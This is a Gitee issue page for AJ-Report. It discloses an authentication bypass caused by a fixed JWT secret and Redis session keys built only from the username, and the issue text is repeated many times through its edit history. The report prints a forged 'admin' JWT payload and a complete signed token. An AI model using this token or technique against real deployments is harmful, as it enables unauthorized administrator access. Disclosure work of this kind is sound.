Authentication Bypass vulnerability

/ 详情

已完成

创建于

2022-10-15 11:40

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): 身份验证绕过漏洞

Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login

输入图片说明

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login

com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN

输入图片说明

Uses a fixed JWT secret key

spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken

spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret

输入图片说明

TokenFilter for authentication

com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter

输入图片说明

Forge different users' Tokens by modifying the username field

{
    "type": 0,
    "uuid": "",
    "tenant": "tenantCode",
    "username": "admin"
}

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjowLCJ1dWlkIjoiIiwidGVuYW50IjoidGVuYW50Q29kZSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.ce3xqqUypEinA_ZCSky9AptKjkG8qFm8ESMuCunqe6Y

输入图片说明

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```
{
    "type": 0,
    "uuid": "",
    "tenant": "tenantCode",
    "username": "admin"
}
```
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjowLCJ1dWlkIjoiIiwidGVuYW50IjoidGVuYW50Q29kZSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.ce3xqqUypEinA_ZCSky9AptKjkG8qFm8ESMuCunqe6Y
```
![输入图片说明](https://foruda.gitee.com/images/1665808075087652462/bf1d477e_1974101.png "image-20221015122659078.png")

创建了任务

修改了描述

原值

### Description

The program uses a fixed JWT secret key, and the user can forge a JWT Token by using the username within one hour after logging in to bypass authentication

### Vulnerability Cause

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

新值

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user can log in within one hour. Forge his JWT token with his username to bypass authentication

### Vulnerability Cause

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

修改了描述

原值

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user can log in within one hour. Forge his JWT token with his username to bypass authentication

### Vulnerability Cause

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

新值

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

修改了描述

原值

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

新值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

修改了描述

原值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

新值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

修改了描述

原值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

新值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

![输入图片说明](https://foruda.gitee.com/images/1665808075087652462/bf1d477e_1974101.png "image-20221015122659078.png")

修改了描述

原值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

![输入图片说明](https://foruda.gitee.com/images/1665808075087652462/bf1d477e_1974101.png "image-20221015122659078.png")

新值

这是英文的漏洞报告，中文的在(This is the English report, the Chinese report is in): [身份验证绕过漏洞](https://gitee.com/anji-plus/report/issues/I5VW0T)

### Description

The program uses a fixed JWT key, and the stored Redis key uses username format characters. Any user who has logged in within an hour. JWT Token can be forged with his username to bypass authentication

Login API

*com.anjiplus.template.gaea.business.modules.accessuser.controller.AccessUserController#login*

![输入图片说明](https://foruda.gitee.com/images/1665805151620562995/1797ad35_1974101.png "image-20221015111709407.png")

Make redis key of format username, Although uuid is used, uuid is not involved in authentication.

*com.anjiplus.template.gaea.business.modules.accessuser.service.impl.AccessUserServiceImpl#login*

*com.anjiplus.template.gaea.business.constant.BusinessConstant#GAEA_SECURITY_LOGIN_TOKEN*

![输入图片说明](https://foruda.gitee.com/images/1665805179908461421/0b37f1b2_1974101.png "image-20221015112014779.png")

Uses a fixed JWT secret key

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.utils.JwtBean#createToken*

*spring-boot-gaea-2.0.5.RELEASE.jar!com.anji.plus.gaea.GaeaProperties.Security#getJwtSecret*

![输入图片说明](https://foruda.gitee.com/images/1665805196081153111/977da809_1974101.png "image-20221015112804990.png")

TokenFilter for authentication

*com.anjiplus.template.gaea.business.filter.TokenFilter#doFilter*

![输入图片说明](https://foruda.gitee.com/images/1665805209638309659/a349a173_1974101.png "image-20221015113222257.png")

Forge different users' Tokens by modifying the username field

```

{

    "type": 0,

    "uuid": "",

    "tenant": "tenantCode",

    "username": "admin"

}

```

```

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0eXBlIjowLCJ1dWlkIjoiIiwidGVuYW50IjoidGVuYW50Q29kZSIsInVzZXJuYW1lIjoiYWRtaW4ifQ.ce3xqqUypEinA_ZCSky9AptKjkG8qFm8ESMuCunqe6Y

```

![输入图片说明](https://foruda.gitee.com/images/1665808075087652462/bf1d477e_1974101.png "image-20221015122659078.png")

修改了标题

将任务状态从 待办的 修改为已完成

展开全部操作日志

登录后才可以发表评论

状态

负责人

里程碑

Pull Requests

关联的 Pull Requests 被合并后可能会关闭此 issue

分支

开始日期 - 截止日期

置顶选项

优先级

参与者（1）

Java

https://gitee.com/anji-plus/report.git

git@gitee.com:anji-plus/report.git

anji-plus

report

AJ-Report

GVP anji-plus / AJ-Report

内容风险标识

Description

评论 (0)

GVPanji-plus / AJ-Report

内容风险标识